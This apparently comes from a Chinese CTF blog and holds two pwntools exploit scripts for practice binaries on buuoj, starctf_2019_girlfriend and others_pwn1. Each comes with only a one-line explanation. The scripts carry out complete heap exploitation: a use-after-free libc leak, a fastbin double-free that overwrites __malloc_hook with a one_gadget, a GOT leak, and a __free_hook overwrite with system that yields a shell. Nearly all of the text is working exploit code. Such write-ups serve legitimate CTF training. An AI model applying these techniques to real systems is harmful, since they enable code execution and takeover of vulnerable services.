others_pwn1&&starctf_2019_girlfriend

starctf_2019_girlfriend

正常的uaf漏洞fastbin attack
exp：

from pwn import *
#p=process('./starctf_2019_girlfriend')
p=remote('node3.buuoj.cn',27758)
elf=ELF('./starctf_2019_girlfriend')
libc=elf.libc
def add(size,name,call):
	p.sendlineafter(':','1')
	p.sendlineafter('name',str(size))
	p.sendlineafter('name:',name)
	p.sendlineafter('call:',call)

def show(idx):
	p.sendlineafter(':','2')
	p.sendlineafter('index:',str(idx))

def edit():
	p.sendlineafter(':','3')

def delete(idx):
	p.sendlineafter(':','4')
	p.sendlineafter('index:',str(idx))

add(0x80,'doudou','137')#0
add(0x18,'doudou1','138')#1
add(0x68,'doudou2','139')#2
add(0x68,'doudou3','140')#3
add(0x20,'doudou4','141')#4
delete(0)
show(0)
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['__malloc_hook']-0x10-88
log.success('libcbase: '+hex(libcbase))
malloc_hook=libcbase+libc.sym['__malloc_hook']
o_g=[0x45216,0x4526a,0xf02a4,0xf1147]
one_gadget=libcbase+o_g[3]
realloc=libcbase+libc.sym['__libc_realloc']
add(0x80,'doudou5','142')#0
delete(2)
delete(3)
delete(2)
add(0x68,p64(malloc_hook-0x23),'142')
add(0x68,'doudou5','143')
add(0x68,'doudou6','144')
add(0x68,'a'*11+p64(one_gadget)+p64(realloc),'145')
p.sendlineafter(':','1')
p.sendlineafter('name',str(1))
p.interactive()

others_pwn1

堆塊上有指針可以直接寫入emem

from pwn import *
#p=process('./pwn1')
p=remote('node3.buuoj.cn',26982)
elf=ELF('./pwn1')
libc=elf.libc
def buy(name,des,man):
	p.sendlineafter('>> ','1')
	p.sendlineafter('name :',name)
	p.sendlineafter('book:',des)
	p.sendlineafter('take?',man)


def show():
	p.sendlineafter('>> ','2')

def Yedit(idx,name,isdes,des,man):
	p.sendlineafter('>> ','3')
	p.sendlineafter('edit?',str(idx))
	p.sendlineafter('name :',name)
	p.sendlineafter('/n)',isdes)
	p.sendlineafter('book:',des)
	p.sendlineafter('take?',man)

def Nedit(idx,name,isdes,man):
	p.sendlineafter('>> ','3')
        p.sendlineafter('edit?',str(idx))
        p.sendlineafter('name :',name)
        p.sendlineafter('/n)',isdes)
        p.sendlineafter('take?',man)

def delete(idx):
	p.sendlineafter('>> ','4')
	p.sendlineafter('delete?',str(idx))
buy('\x11'*4,'\x22'*4,'1')#0
buy('\x33'*4,'\x44'*4,'2')#1
buy('/bin/sh\x00','/bin/sh\x00','3')
delete(0)
payload=p64(0)*9+p64(elf.got['atoi'])
Nedit(0,payload,'n','100')
show()
libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['atoi']
system=libcbase+libc.sym['system']
free_hook=libcbase+libc.sym['__free_hook']
payload=p64(0)*9+p64(free_hook)
Nedit(0,payload,'n','100')
Yedit(0,'a','y',p64(system),'1')
show()
delete(2)
p.interactive()